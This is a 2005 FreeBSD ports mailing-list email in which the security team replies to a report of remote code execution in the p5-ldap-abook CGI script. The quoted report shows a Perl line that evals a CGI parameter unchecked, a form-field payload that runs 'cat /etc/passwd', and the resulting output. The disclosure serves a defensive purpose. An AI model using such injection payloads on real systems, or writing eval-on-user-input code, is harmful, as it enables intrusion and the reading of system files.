From owner-freebsd-ports@FreeBSD.ORG  Fri Nov 18 10:17:52 2005
Return-Path: <owner-freebsd-ports@FreeBSD.ORG>
X-Original-To: ports@FreeBSD.org
Delivered-To: freebsd-ports@FreeBSD.ORG
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP id 6892B16A41F;
	Fri, 18 Nov 2005 10:17:52 +0000 (GMT)
	(envelope-from simon@eddie.nitro.dk)
Received: from eddie.nitro.dk (zarniwoop.nitro.dk [83.92.207.38])
	by mx1.FreeBSD.org (Postfix) with ESMTP id F184F43D53;
	Fri, 18 Nov 2005 10:17:51 +0000 (GMT)
	(envelope-from simon@eddie.nitro.dk)
Received: by eddie.nitro.dk (Postfix, from userid 1000)
	id 79794119C50; Fri, 18 Nov 2005 11:17:47 +0100 (CET)
Date: Fri, 18 Nov 2005 11:17:47 +0100
From: "Simon L. Nielsen" <simon@FreeBSD.org>
To: Roman Mashirov <mrj@mrj.spb.ru>
Message-ID: <20051118101746.GB98443@eddie.nitro.dk>
References: <437DA508.8070409@mrj.spb.ru>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="4bRzO86E/ozDv8r1"
Content-Disposition: inline
In-Reply-To: <437DA508.8070409@mrj.spb.ru>
User-Agent: Mutt/1.5.11
Cc: ports@FreeBSD.org, security@FreeBSD.org
Subject: Re: FreeBSD Port: p5-ldap-abook-1.00
X-BeenThere: freebsd-ports@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: Porting software to FreeBSD <freebsd-ports.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-ports>,
	<mailto:freebsd-ports-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-ports>
List-Post: <mailto:freebsd-ports@freebsd.org>
List-Help: <mailto:freebsd-ports-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-ports>,
	<mailto:freebsd-ports-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Fri, 18 Nov 2005 10:17:52 -0000


--4bRzO86E/ozDv8r1
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On 2005.11.18 12:55:20 +0300, Roman Mashirov wrote:

> This cgi script contains remote code exec. In the following code (line 12=
8):
> my $attr =3D eval $query->param(entry);
> script directly evaluates cgi paramter, received form client, so <input=
=20
> type=3Dhidden name=3Dentry value=3D"system 'cat /etc/passwd';"> leads to =
the=20
> following output from script:
>=20
> # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $=
=20
> # root:*:0:0:Charlie &:/root:/bin/csh

Yay! :-/

Have you tried to exploit it and verified that this exploit works?  (I
don't see any input checking from a quick check but I cannot check
before tonight CET).

--=20
Simon L. Nielsen
FreeBSD Security Team

--4bRzO86E/ozDv8r1
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDfapKh9pcDSc1mlERAnLoAJ0S84Mno7cYlFIClufZ6FTmC8dTbgCfbWSq
FOQWhGL0G7yFgBntzeJSi/o=
=6LX8
-----END PGP SIGNATURE-----

--4bRzO86E/ozDv8r1--